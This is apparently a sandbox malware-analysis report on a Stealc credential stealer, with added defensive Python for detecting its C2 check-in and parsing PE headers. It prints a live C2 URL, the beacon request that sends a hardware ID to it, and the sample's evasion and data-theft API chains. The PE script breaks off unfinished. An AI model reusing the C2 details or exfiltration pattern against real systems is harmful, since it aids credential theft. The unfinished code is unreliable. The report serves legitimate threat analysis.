Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1540694
MD5: c85bd4b2ad207a44d2cf47f0b48d6d09
SHA1: 3d20ea5592b7742bf5a05c166aa3e18c9d187681
SHA256: 294ee8a1545ecad7c74a8994fd7cd56acbdf3694ee80a77ba33e12c0067717d7
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7400 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C85BD4B2AD207A44D2CF47F0B48D6D09)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings whose development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Malware configuration (Stealc): {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara matches

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1705479023.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7400 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7400 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.340000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-24T01:10:02.998180+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.340000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00347240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00349AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00349B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00358EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00354910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00354570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0034F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00353EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFH
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 38 37 31 34 44 39 39 42 30 32 31 32 32 35 36 38 36 33 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 2d 2d 0d 0a
    Data Ascii (CRLF shown as \r\n): ------JJECGCBGDBKJJKEBFBFH\r\nContent-Disposition: form-data; name="hwid"\r\n\r\n8E8714D99B021225686314\r\n------JJECGCBGDBKJJKEBFBFH\r\nContent-Disposition: form-data; name="build"\r\n\r\ndoma\r\n------JJECGCBGDBKJJKEBFBFH--\r\n
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (7 connections)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00344880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1746396519.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1746396519.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1746396519.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php6
Source: file.exe, 00000000.00000002.1746396519.0000000001011000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=
Source: file.exe, 00000000.00000002.1746396519.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
Source: file.exe, 00000000.00000002.1746396519.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phph
Source: file.exe, 00000000.00000002.1746396519.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37=
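The check-in above is the whole of the first beacon: a POST to a hard-coded IP (no DNS query precedes it), no User-Agent header, and a multipart body carrying only an "hwid" and a "build" field whose value ("doma") matches the "Botnet" entry of the extracted configuration. The following Python is an added example, not part of the sandbox report and not Stealc's code: it re-assembles the captured request from the bytes shown above (the framing is standard HTTP, the headers, boundary, field names and values are the report's), parses the multipart body by hand, and returns the traits a detection engineer would key on. The indicator names in the result dictionary are this example's own, not vendor signature names.

```python
import ipaddress
import re

# Constructed from the request shown in the report above (method, path, headers,
# boundary, field names and values are the report's; the CRLF framing is standard
# HTTP). This is a reconstruction for the example, not a new capture.
CAPTURED_CHECKIN = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFH\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------JJECGCBGDBKJJKEBFBFH\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"8E8714D99B021225686314\r\n"
    b"------JJECGCBGDBKJJKEBFBFH\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"doma\r\n"
    b"------JJECGCBGDBKJJKEBFBFH--\r\n"
)


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body).
    Header names are lower-cased; the body is returned byte-for-byte."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("latin-1").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, boundary: bytes) -> dict:
    """Return {field_name: value_bytes} for a multipart/form-data body (RFC 7578).
    The CRLF before each delimiter is framing, not part of the value, so a value
    may itself contain CRLFs without being truncated."""
    delimiter = b"--" + boundary
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):            # "--boundary--" closes the body
            break
        if part.startswith(b"\r\n"):
            part = part[2:]
        part_head, _, value = part.partition(b"\r\n\r\n")
        if value.endswith(b"\r\n"):
            value = value[:-2]
        m = re.search(rb'name="([^"]*)"', part_head)
        if m:
            fields[m.group(1).decode("latin-1")] = value
    return fields


def checkin_indicators(raw: bytes) -> dict:
    """Pull out the check-in fields plus the traits the sandbox flagged:
    no User-Agent, a bare-IP Host (consistent with no DNS lookup), and a
    multipart POST that carries exactly an 'hwid' and a 'build' field."""
    method, path, headers, body = parse_http_request(raw)
    ctype = headers.get("content-type", "")
    m = re.search(r"boundary=([^;\s]+)", ctype)
    boundary = m.group(1).strip('"').encode("latin-1") if m else b""
    fields = parse_multipart(body, boundary) if boundary else {}
    host = headers.get("host", "")
    try:
        ipaddress.ip_address(host)
        bare_ip_host = True
    except ValueError:
        bare_ip_host = False
    return {
        "method": method,
        "path": path,
        "host": host,
        "content_length_ok": int(headers.get("content-length", -1)) == len(body),
        "missing_user_agent": "user-agent" not in headers,
        "bare_ip_host": bare_ip_host,
        "fields": {k: v.decode("latin-1") for k, v in fields.items()},
        # Indicator name is this example's own, not a vendor signature.
        "looks_like_stealc_checkin": (
            method == "POST"
            and ctype.startswith("multipart/form-data")
            and set(fields) == {"hwid", "build"}
        ),
    }


if __name__ == "__main__":
    for key, value in checkin_indicators(CAPTURED_CHECKIN).items():
        print(f"{key}: {value}")
```

Run against the reconstructed request, checkin_indicators() reports hwid 8E8714D99B021225686314 and build doma, a missing User-Agent, a bare-IP Host and a Content-Length that matches the 211-byte body. The multipart parser deliberately avoids stripping whitespace from values, since a stealer's later uploads carry binary file contents in the same framing.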

System Summary

Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006070F3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EC9B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00632A96
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071035F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B43DE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00711BD7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00707C29
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B34C6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0060BCC8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0076ACA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00648DAB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006C0D8F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007EDE77
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0070966C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00704625
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007A17DD
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 003445C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: xisdcata ZLIB complexity 0.9949372386961908
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe, 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1705479023.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00359600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00353720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\T1OZWGAW.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1809408 > 1048576
Source: file.exe | Static PE information: Raw size of xisdcata is bigger than: 0x100000 < 0x193a00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.340000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xisdcata:EW;bazuxvkp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xisdcata:EW;bazuxvkp:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00359860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c5de1 should be: 0x1c6936
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: xisdcata
Source: file.exe | Static PE information: section name: bazuxvkp
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0035B035 push ecx; ret (at 0_2_0035B048)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0076D012 push eax; mov dword ptr [esp], edx (at 0_2_0076D05A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0076D012 push 7FECB9A0h; mov dword ptr [esp], edx (at 0_2_0076D081)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E7014 push 55D365F6h; mov dword ptr [esp], esi (at 0_2_007E707D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E7014 push 31CB389Bh; mov dword ptr [esp], edx (at 0_2_007E7114)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push 4CED349Fh; mov dword ptr [esp], ebx (at 0_2_00701113)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push 4CC958F3h; mov dword ptr [esp], ecx (at 0_2_0070111D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push eax; mov dword ptr [esp], edx (at 0_2_007012F0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push eax; mov dword ptr [esp], edx (at 0_2_00701314)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push ebx; mov dword ptr [esp], edx (at 0_2_0070137C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push 38C6E934h; mov dword ptr [esp], esi (at 0_2_007013CA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push ebp; mov dword ptr [esp], 2AD17891h (at 0_2_00701428)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push edx; mov dword ptr [esp], 56D69300h (at 0_2_00701497)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push edx; mov dword ptr [esp], esi (at 0_2_007014D8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push ebp; mov dword ptr [esp], edi (at 0_2_00701518)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push 6DFF3FD2h; mov dword ptr [esp], esp (at 0_2_00701535)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push edi; mov dword ptr [esp], 4F8DFF09h (at 0_2_007015EA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push 6C6DF282h; mov dword ptr [esp], ebx (at 0_2_00701743)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push 3680CF58h; mov dword ptr [esp], ecx (at 0_2_0070174B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push edi; mov dword ptr [esp], 5EEFCDE9h (at 0_2_007017CD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push esi; mov dword ptr [esp], ebx (at 0_2_007017F7)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push edi; mov dword ptr [esp], 3DFBA0E5h (at 0_2_007017FC)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push edi; mov dword ptr [esp], 4CB923CBh (at 0_2_0070181A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push esi; mov dword ptr [esp], 7B2D27BAh (at 0_2_0070184F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push ebp; mov dword ptr [esp], esi (at 0_2_007018E7)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push 0FD4743Eh; mov dword ptr [esp], edi (at 0_2_0070198D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push ecx; mov dword ptr [esp], edx (at 0_2_00701A77)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push ebx; mov dword ptr [esp], 6E5BD191h (at 0_2_00701AFA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push 397CBF65h; mov dword ptr [esp], eax (at 0_2_00701B85)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push edx; mov dword ptr [esp], 16EDE921h (at 0_2_00701C3D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007010F4 push 3657D360h; mov dword ptr [esp], ebx (at 0_2_00701CAC)
Source: file.exe | Static PE information: section name: xisdcata entropy: 7.953663128653993
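Most of the static findings in this section come from a plain header walk: two blank and three invented section names, an entry point that resolves into .taggant rather than a code section, a xisdcata section with entropy 7.95 (packed or encrypted payload), a CheckSum field (0x1c5de1) that does not match the file (0x1c6936), and, from the unpacking signature, sections that are both writable and executable. The following Python is an added example, not code from the report or from the sample: it implements the PE CheckSum algorithm, per-section entropy and characteristics checks, and an entry-point lookup, then exercises them on a minimal PE that it builds itself. Only the layout of that test image (section names xisdcata and .taggant, entry point inside .taggant) is borrowed from the report; the bytes, sizes, the 7.0 bits-per-byte threshold and the list of "standard" section names are this example's assumptions. file.exe itself is not on this page and is not read.

```python
import math
import struct
from collections import Counter

# Section names a normal linker emits; anything else (or a blank name) is non-standard.
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".pdata", ".CRT", ".didat"}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """PE CheckSum as imagehlp computes it: dword sum with end-around carry, skipping
    the CheckSum field itself, folded to 16 bits, plus the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    skip, total = checksum_offset & ~3, 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_pe(data: bytes) -> dict:
    """Minimal header walk (PE32 and PE32+): entry point, CheckSum and section table."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                 # optional header follows the 20-byte COFF header
    checksum_offset = opt + 64          # same position in PE32 and PE32+ optional headers
    sections = []
    for i in range(nsections):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vaddr": vaddr,
                         "vsize": max(vsize, rawsize), "characteristics": chars,
                         "entropy": shannon_entropy(data[rawptr:rawptr + rawsize])})
    return {"entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "stored_checksum": struct.unpack_from("<I", data, checksum_offset)[0],
            "checksum_offset": checksum_offset, "sections": sections}


def static_findings(data: bytes, entropy_threshold: float = 7.0) -> list:
    """Reproduce the report's static signatures on one PE image."""
    pe = parse_pe(data)
    findings = []
    for s in pe["sections"]:
        label = s["name"] or "(blank)"
        if s["name"] not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name: {label}")
        if s["entropy"] >= entropy_threshold:     # packed or encrypted payload
            findings.append(f"high-entropy section {label}: {s['entropy']:.2f} bits/byte")
        if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE and s["characteristics"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"writable and executable section: {label}")
    ep = pe["entry_rva"]
    ep_sec = next((s for s in pe["sections"] if s["vaddr"] <= ep < s["vaddr"] + s["vsize"]), None)
    if ep_sec is None or ep_sec["name"] not in STANDARD_SECTIONS:
        findings.append(f"entry point 0x{ep:x} lies in {ep_sec['name'] if ep_sec else 'no section'}")
    computed = pe_checksum(data, pe["checksum_offset"])
    if pe["stored_checksum"] != computed:
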